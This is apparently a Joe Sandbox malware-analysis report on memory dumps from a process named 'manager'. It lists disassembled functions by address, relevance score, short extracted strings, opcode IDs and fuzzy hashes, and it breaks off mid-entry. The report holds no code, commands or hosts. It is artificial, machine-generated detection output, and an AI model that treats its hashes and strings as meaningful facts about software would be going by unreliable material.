                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 083756cb603584b48372dbfa8e9c2cc85a87342410ea884a79796aae7666f8d4
                                                                                                                                                                                                  • Instruction ID: fb8422f85f436ca9bf21638bc99ee8b3f03ad0326d60eb4d00404df01aee30f4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 083756cb603584b48372dbfa8e9c2cc85a87342410ea884a79796aae7666f8d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3821E570910209DFCF45FFE8E484A9D7BF1FB44308F405959D015AB265EB715A4AEF81
                                                                                                                                                                                                  Function 023B0A70 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a0faff2e4bd31b6723715310d6145978d5cff6c715353859061bc6eeba63df44
                                                                                                                                                                                                  • Instruction ID: c7ef24471ec4e00debdd78d43711e103ec36ae54edd9bbd4df3fcfef15cf9673
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0faff2e4bd31b6723715310d6145978d5cff6c715353859061bc6eeba63df44
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9212871D0015A9FCF01DFA9D4909EDBBB1EF49310F8586AAD461BB262DB30A94ACF50
                                                                                                                                                                                                  Function 023B1978 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cad2a47c41a1203b5e36e9af4718302ece998e39559b2eab765012698671d086
                                                                                                                                                                                                  • Instruction ID: 10c291490fbf649ac3d4766f8fa43df30033340a056da9df4131826c674bbbc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cad2a47c41a1203b5e36e9af4718302ece998e39559b2eab765012698671d086
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF064B4C082898ACF11CFA6D0543EEBBB4AB8D300F00942AC594BB241D7380A4ACFA5
                                                                                                                                                                                                  Function 023B0A09 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7544cec17d973d816e779d60fa9953070b743a5db4c840d2a28c2a505444d57a
                                                                                                                                                                                                  • Instruction ID: 6a8e91f056d43160123e71541ebf47061d17104a82693418eecf58fe1604993f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7544cec17d973d816e779d60fa9953070b743a5db4c840d2a28c2a505444d57a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01C470C05259DFCB06EFF8D45499DBFB0AF0A204F144AEAC855AB261EB709A44DB81
                                                                                                                                                                                                  Function 023B0A18 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000029.00000002.2652739804.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_41_2_23b0000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bfc953536c7315b42c5697f0681be25d10202bd055a7da7a1a8ba5d98ba8fc1b
                                                                                                                                                                                                  • Instruction ID: f41911c025b872286eb2bc2e40d521a841f5643121689c0d6a11ed4ba147324f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfc953536c7315b42c5697f0681be25d10202bd055a7da7a1a8ba5d98ba8fc1b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF0B270C00219DFCB45EFB8D544AEEBBB4FF05304F104AAAC815AB250EB719A44DF81

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 03223768 Relevance: 8.1, Strings: 6, Instructions: 640COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (hr$(hr$(hr$(hr$(hr$(hr
                                                                                                                                                                                                  • API String ID: 0-431374215
                                                                                                                                                                                                  • Opcode ID: b747062013b38f9b6f317cac32e03888fe9eb846c6bd6cef0b513d5f9d30fe1c
                                                                                                                                                                                                  • Instruction ID: db70317dd841ede8d618a82ed9b4b4fff9fae76634d5c195353a26e2c3db87c7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b747062013b38f9b6f317cac32e03888fe9eb846c6bd6cef0b513d5f9d30fe1c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE62AD74A01229CFCB24CF69C984BD9BBF5BF4A300F5082A9D449AB365D734AE85CF51
                                                                                                                                                                                                  Function 03224350 Relevance: 4.2, Strings: 3, Instructions: 436COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (hr$(hr$(hr
                                                                                                                                                                                                  • API String ID: 0-1014567274
                                                                                                                                                                                                  • Opcode ID: bfc305bc9ab3bf27df473021ccb215534a18e337b433f6321141073f0f5782b7
                                                                                                                                                                                                  • Instruction ID: 8b7582f34150e5b1db6e4bd5071d1594185cf920a6838c8382174bece39077a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfc305bc9ab3bf27df473021ccb215534a18e337b433f6321141073f0f5782b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6622AC74E10219CFDB54CFA9C884B9DFBB9BF49310F14929AE818AB361D770A985CF40
                                                                                                                                                                                                  Function 03223759 Relevance: 4.2, Strings: 3, Instructions: 429COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (hr$(hr$(hr
                                                                                                                                                                                                  • API String ID: 0-1014567274
                                                                                                                                                                                                  • Opcode ID: 92d5e32787c6df6df2e0b1009ead3b8a3606944d98c0eb3e6b5c6637d96dcd82
                                                                                                                                                                                                  • Instruction ID: d0a9b063cce1ddaa3ccda1e6e200cb1ba2dde8ef89c59ab872dceb4b9a5fff83
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92d5e32787c6df6df2e0b1009ead3b8a3606944d98c0eb3e6b5c6637d96dcd82
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27229F74A012298FCB24CF69C984BD9BBF1BF4A300F5482E9D449AB365D774AE85CF41
                                                                                                                                                                                                  Function 03220B88 Relevance: 2.0, Strings: 1, Instructions: 797COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: dwq
                                                                                                                                                                                                  • API String ID: 0-1204298229
                                                                                                                                                                                                  • Opcode ID: e947e9ef322846ee4a4a4df7becbd003efc5540aa1c9c25ef5625909a4c49e54
                                                                                                                                                                                                  • Instruction ID: 08d21781c19f5ab76b7f5dc6eb8aaa05786c538f04cb99d7f3f550bd9bc2c903
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e947e9ef322846ee4a4a4df7becbd003efc5540aa1c9c25ef5625909a4c49e54
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F82A174A102298FCB24CF69D884BDDBBB5FF49300F1095EAD409AB265DB74AE85CF50
                                                                                                                                                                                                  Function 03222138 Relevance: 1.6, Strings: 1, Instructions: 334COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (wq
                                                                                                                                                                                                  • API String ID: 0-1062398946
                                                                                                                                                                                                  • Opcode ID: 76dbafd9f8ea5a8170435b77c315e946f1317706fa42b3f6dcbbb0bca461c062
                                                                                                                                                                                                  • Instruction ID: c3b21c2d8c9f523efda37b8c4a32917095dda797574200973ae3b1c0e5a5dd6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76dbafd9f8ea5a8170435b77c315e946f1317706fa42b3f6dcbbb0bca461c062
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CE1F274A10218CFDB58DFA9C994A9DBBF2FF89300F208569D405AB365DB35AD82CF50
                                                                                                                                                                                                  Function 03220B78 Relevance: .4, Instructions: 403COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e6d0deb625b07bc363a3f81bed08b3e3c0bb8a902211dbd1540edc2d514db793
                                                                                                                                                                                                  • Instruction ID: 6e69695636906e7a5077017eb3ba39d8e7bec4e7ea5f4d76390a97e2b059cc3e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6d0deb625b07bc363a3f81bed08b3e3c0bb8a902211dbd1540edc2d514db793
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F12B374E10229CFCB24CF69D884BDDBBB5FF49304F108296D409AB265DB74AA85CF50
                                                                                                                                                                                                  Function 03224B80 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9e1e4c80459258f7d1aea7df88ec0c61a6bc4a45645974043bc1b6ee691bdbec
                                                                                                                                                                                                  • Instruction ID: 44372d83f7b283af57e179d2b5d6320e1a387bdba03526329fb1bcfad7d0bcf7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e1e4c80459258f7d1aea7df88ec0c61a6bc4a45645974043bc1b6ee691bdbec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AB19F75E103198FCB14DFA9C984ADDBBF1BF49310F2591A9E409AB365D730AA85CF80
                                                                                                                                                                                                  Function 03224411 Relevance: 2.6, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (hr$(hr
                                                                                                                                                                                                  • API String ID: 0-2207020532
                                                                                                                                                                                                  • Opcode ID: ec0afb7dd9779bc40ded6528b4dc8c5bc55e9a8ba1a6ac38e656f8720817c5ad
                                                                                                                                                                                                  • Instruction ID: a07da7b5c8c1e4c0f38f764e74e19cda3cdeeed12582868ff68ea6996e0368fc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec0afb7dd9779bc40ded6528b4dc8c5bc55e9a8ba1a6ac38e656f8720817c5ad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08319174E002098FDB18DFA9C9809DDBBF5BF89314F20916AD419AB355D730A985CF50
                                                                                                                                                                                                  Function 03224A53 Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: htq$htq
                                                                                                                                                                                                  • API String ID: 0-2321306706
                                                                                                                                                                                                  • Opcode ID: e9f1008c6b1e01a84a52a58d2e89f9a318a7067f0da4aa319ac3d11eec2cd452
                                                                                                                                                                                                  • Instruction ID: c1d17a646a765d9c65270bd9f4a9a148ed181554a9695f585055b9279220ae9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9f1008c6b1e01a84a52a58d2e89f9a318a7067f0da4aa319ac3d11eec2cd452
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE21F6B4E0012A9FCF05DFA8D9409EDBBB5FF89310F51865AD414BB391DB30A906CB90
                                                                                                                                                                                                  Function 03224230 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: htq$htq
                                                                                                                                                                                                  • API String ID: 0-2321306706
                                                                                                                                                                                                  • Opcode ID: 44fded9701e4a7818880102996597f1d5e7bd9138363106d4efb0d5fdaa65d31
                                                                                                                                                                                                  • Instruction ID: c6a1dd8575c0bbeca47f297bf0977c502306d397cda271cfc97a6bb75faf3257
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44fded9701e4a7818880102996597f1d5e7bd9138363106d4efb0d5fdaa65d31
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C72139B4E0025A9FCF06DFA8CA409DDBBF5EF49310F01829AD455BB291DB30A946CF91
                                                                                                                                                                                                  Function 03225560 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (wq
                                                                                                                                                                                                  • API String ID: 0-1062398946
                                                                                                                                                                                                  • Opcode ID: 049174216ed87dc3ddc4514e533606c6b15cbabf72c2c3594d2b5df7f7f3f49a
                                                                                                                                                                                                  • Instruction ID: ad613e0215b890357fac9451630c7e0151c42c48a9cb2738d195017b05dc5b29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 049174216ed87dc3ddc4514e533606c6b15cbabf72c2c3594d2b5df7f7f3f49a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52E1A074E00219CFDB14CFA8C984A9DFBF5BF49300F149299E819AB369D770A986CF40
                                                                                                                                                                                                  Function 03225550 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (wq
                                                                                                                                                                                                  • API String ID: 0-1062398946
                                                                                                                                                                                                  • Opcode ID: 7b943fc9a490f30b3ac4d6dc53a60e7f6423f68bb179a436cb5ea7a660572ffd
                                                                                                                                                                                                  • Instruction ID: 475349b62083cdfc907e5431f34134c4d0d840e42a5a7cdf93a82a500bb072bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b943fc9a490f30b3ac4d6dc53a60e7f6423f68bb179a436cb5ea7a660572ffd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AE19074E00219CFDB54CFA8C984A9DFBF2BF49300F159199E819AB369D770A986CF50
                                                                                                                                                                                                  Function 032221AC Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (wq
                                                                                                                                                                                                  • API String ID: 0-1062398946
                                                                                                                                                                                                  • Opcode ID: bc757dbb58106d6d0d7c741837271c47d984e84caa30400cc4a3c24cd605da48
                                                                                                                                                                                                  • Instruction ID: 5058957cba20bddfe646e1b01e2e0aac15c7bf3d307fc94f026c744697199fb4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc757dbb58106d6d0d7c741837271c47d984e84caa30400cc4a3c24cd605da48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B591E574A01218CFDB19DFB8D994A9DBBB2FF89300F208569D405AB365DB35AD82CF50
                                                                                                                                                                                                  Function 03224B70 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: htq
                                                                                                                                                                                                  • API String ID: 0-455586381
                                                                                                                                                                                                  • Opcode ID: 192debe0a8c6cd482d9e996c160fa10e8f7f425333fc9df59c2d548c665befd6
                                                                                                                                                                                                  • Instruction ID: fb8ca5e108b77bd388727c871e6ebc068bdab3e24f1404fd1ce28990e35e01bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 192debe0a8c6cd482d9e996c160fa10e8f7f425333fc9df59c2d548c665befd6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF512874E003199FCB14DFA9C980ADDFBF1FF89310F119595D458AB261DB30AA86CB80
                                                                                                                                                                                                  Function 03220838 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: 20faf447bf179947ef7aa52a50e215cfaea5794139599c9d71b0804d740f0a3a
                                                                                                                                                                                                  • Instruction ID: 4fbe1217abe555286b4d0b36962faafd440eec863b0ff5f8b7831fa5e978ca62
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20faf447bf179947ef7aa52a50e215cfaea5794139599c9d71b0804d740f0a3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C92171B0A0020ADFCB05EFACFD8468DBBB5FB84304F009699D004AB251EB745E46DF81
                                                                                                                                                                                                  Function 03220848 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LRsq
                                                                                                                                                                                                  • API String ID: 0-3165563352
                                                                                                                                                                                                  • Opcode ID: bd8226935da96ddbfce193cf24907e3c449ea7d2fb42357fc2f02ede82bd0758
                                                                                                                                                                                                  • Instruction ID: ecde3423ee5b07d4dac8be5d83691e3b4f0ea7b2ed34d75d27de39bd44306dad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd8226935da96ddbfce193cf24907e3c449ea7d2fb42357fc2f02ede82bd0758
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B2132B4A0020ADFCB04EFACFD8469DBBB5FB84304F009A99D405AB255DB745E45DF91
                                                                                                                                                                                                  Function 03222F20 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9e5056c60e8f3c2572b1a4a7fd8ab8dd8dca6df3e7332e54ac16389dbd9ff926
                                                                                                                                                                                                  • Instruction ID: 4b293724c597f2bbba299e8f1fe23c94d495fc8b0892f25429b161e64ec3f3e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e5056c60e8f3c2572b1a4a7fd8ab8dd8dca6df3e7332e54ac16389dbd9ff926
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B51DDB4D042599FCF10CFAAD980A9EFFB1AF49300F24902AE918BB250D7349A85CF54
                                                                                                                                                                                                  Function 032212B5 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 93bec15fa88df90843ab2dac5baed9fe9f158c67c68e280e2514a9e43c00d11c
                                                                                                                                                                                                  • Instruction ID: 58eb43386e4cdda171a05ae23e0ffb6408752ca21b08187357ff6ce3ad3f12a1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93bec15fa88df90843ab2dac5baed9fe9f158c67c68e280e2514a9e43c00d11c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34A19374A102298FCB24CFA9D884BDDBBB5FF49300F1092D6D409AB355DB74AA85CF50
                                                                                                                                                                                                  Function 032221F0 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a5517db3078122fa6491836e25302c8090973d1e672f77fccf9ee7cc869d4861
                                                                                                                                                                                                  • Instruction ID: e77c246bff1ce48168b5691766519b0a988a14de63b247ab8030e9fd910e7cde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5517db3078122fa6491836e25302c8090973d1e672f77fccf9ee7cc869d4861
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B191D474A01218CFCB18DFB9D994A9DBBB2FF89300F209569D405AB365DB35AD82CF50
                                                                                                                                                                                                  Function 032232F0 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002A.00000002.4564854093.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_42_2_3220000_manager.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 407947524a02ef97533101e745eb0944d5aac4d5253663e9f4c742518d8c7781
